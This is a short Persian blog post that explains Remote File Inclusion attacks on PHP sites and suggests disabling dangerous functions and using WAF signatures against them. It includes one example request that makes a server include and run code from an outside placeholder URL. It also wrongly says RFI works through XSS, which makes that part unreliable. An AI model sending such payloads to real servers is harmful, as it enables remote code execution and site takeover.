• ورود
  • هیچ محصولی در سبد خرید نیست.

Remote File Inclusion یا RFI چیست؟

images

Remote File Inclusion یا به اختصار RFI به هکرها اجازه می دهد تا به وسیله یک اسکریپت، اقدام به آپلود کد و فایلهای آلوده روی سرور کنند. این مورد در صورت وجود آسیب پذیری در سرور و یا وب سایت، به وسیله تزریق کد یا همان XSS انجام می گردد. در صورت وجود این آسیب پذیری، می تواند منجر به ارائه دسترسی Deface سایت، دسترسی اجرای دستورات و در نتیجه دسترسی shell گردد.

به طور مثال دستور زیر می تواند یک کد را از طریق URL در سرور اجرا نماید.

http://example.something/index.php?page=http://url/file.txt

توجه داشته باشید که کد مخرب در فایل متنی نوشته می شود. این مورد معمولا با غیر فعال نمودن توابع خطرناک php نظیر system و exec و … قابل پیشگیری است. ولی جهت امنیت بالاتر، می بایست از Signature های تشخیص حملات RFI در WAF های نرم افزاری/سخت افزاری استفاده نمود.

مهر 9, 1395

0 پاسخ به "Remote File Inclusion یا RFI چیست؟"

ارسال یک پیام

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

تمامی حقوق سایت متعلق به ریجاکس بوده و نزد آن محفوظ می باشد.